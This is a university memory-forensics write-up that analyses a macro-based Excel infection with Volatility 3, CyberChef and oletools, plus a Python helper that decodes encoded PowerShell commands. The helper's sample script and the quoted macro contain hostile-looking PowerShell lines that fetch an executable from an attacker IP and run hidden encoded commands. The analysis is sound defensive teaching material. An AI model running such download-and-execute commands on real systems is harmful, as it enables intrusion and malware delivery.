A project completed for the "Concept And Techniques For Malware Analysis" module during my university studies.
A memory forensics case study
- The forensic analysis was conducted in Kali Linux inside a virtual environment.
- Volatility is used to analyse the digital evidence, the assignment1.vmem memory image; I used Volatility 3 plugins to carry out the memory forensics and to recover any malicious document present on the target.
- CyberChef to decode an encoded PowerShell command.
- LibreOffice to open the potentially malicious Office document and get a better overview of the incident.
- VirusTotal for cross-referencing: it analyses suspicious files for malware and malicious content using multiple antivirus engines and website scanners.
You are working as a Digital Forensics Analyst as part of the Incident Response team in Advanced Cores Enterprises. You received an alert from your colleagues in the Security Operations Centre that they detected suspicious network activities originating from the computer belonging to one of the staff from the Finance department. As part of your Incident Response Procedure, you have acquired the memory image from the suspected computer. You have been tasked to perform an analysis on the memory image, assignment1.vmem, and write a report to document your findings.

• Using the windows.imageinfo plugin of the Volatility 3 framework, the target system was identified as a Windows system running on an x64 architecture.

• First, I used the “psscan” plugin to list all processes present at the time the memory image was acquired.
• At first glance, a suspicious-looking process, EXCEL.EXE, caught my attention, so I used “grep” to isolate that process and identify its parent process.

• To find more clues, I used the “cmdline” plugin and found that the EXCEL.EXE process was used to create a file named latest_finance_accounts.xls. This is all the more suspicious because the victim works in the Finance department, so the document may be embedded with malicious macros.
• At this point I formed a hypothesis: the victim received an Outlook email (Outlook.exe was captured in image 1) with the “latest_finance_account” file attached, which contained a malicious macro. Once the victim opened the file, the macro ran and executed the payload.

• I used “pstree” to list its child processes; the result shows that excel.exe spawns a child process, powershell.exe, which is even more suspicious. Furthermore, the PowerShell command line carries a long encoded script, so I investigated further.

• That powershell.exe spawns another powershell.exe, which in turn spawns Excelsvc.exe. Since all of the previous clues lead to this process, I chose it as the likely malicious process that infected the machine.

• The cmdline, getsids and handles plugins yielded little additional information about the target process.

• A potential C2 IP address and port were identified, since the network connection belongs to the suspected process. IP address: 192.168.221.135

• The “malfind” plugin returned a hit for the target process, which supports my hypothesis.

• To confirm whether the process is malicious, I dumped the process executable and uploaded the file to VirusTotal.

• The VirusTotal results confirm that the process is malicious.

• I copied the suspicious encoded PowerShell script found earlier into CyberChef and decoded it.
• The decoded script appears to download a payload from the attacker's C2 server and save it as excelsvc.exe to avoid detection.
• The IP address in the URL matches the IP address found earlier.
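The CyberChef decoding step above, scripted so it can be repeated on any command line that Volatility reports. This is an added example and not part of the original write-up; the command line, regular expressions and the sample encoded script are constructed assumptions, and only the suspect IP comes from the case study.

```python
"""Decode a PowerShell -EncodedCommand argument and triage its indicators.

PowerShell's -EncodedCommand / -enc switch takes Base64 of the script
encoded as UTF-16LE, which is why a plain Base64 decode shows NUL bytes
between the characters (and why CyberChef needs "Decode text UTF-16LE").
"""
import base64
import re
from typing import Optional

# IP reported for the suspect process earlier in the case study.
SUSPECT_C2_IP = "192.168.221.135"

# Assumed patterns: the encoded-command switch and the indicators we want.
ENC_ARG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXE_RE = re.compile(r"[\w.-]+\.exe\b", re.IGNORECASE)


def find_encoded_arg(cmdline: str) -> Optional[str]:
    """Return the Base64 blob following -enc/-EncodedCommand, if present."""
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """Base64-decode, then interpret the bytes as UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_indicators(script: str) -> dict:
    """Collect URLs, IPs and dropped .exe names; flag the known C2 IP."""
    ips = sorted(set(IP_RE.findall(script)))
    return {
        "urls": URL_RE.findall(script),
        "ips": ips,
        "exe_names": sorted(set(EXE_RE.findall(script))),
        "matches_suspect_c2": SUSPECT_C2_IP in ips,
    }


# Constructed sample, NOT the real command recovered from assignment1.vmem.
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadFile('http://192.168.221.135/u', 'excelsvc.exe')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    blob = find_encoded_arg(SAMPLE_CMDLINE)
    print(extract_indicators(decode_encoded_command(blob)))
```

Feed it the powershell.exe line from the cmdline plugin output; a `matches_suspect_c2` of True ties the decoded script to the connection seen on the suspect process.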

• A quick triage with the “strings” command captured multiple cryptography-related keywords, suggesting a possible ransomware incident.

• Dumped the Excel file.

• Using oletools (oleid.py), the Excel file was found to contain a malicious macro.

• olevba.py extracted the malicious macro, and I proceeded to analyse the VBA script. According to the VBA, the script runs automatically when the document is opened if macros are enabled.

• I replaced the declared variables with understandable names and decoded the necessary lines to get a rough idea of what the script does.
• The script analysis shows that the script runs automatically once the document is opened and executes the command “powershell L -W 1 -C powershell - \n nc (encoded string from cell(1583,245))”.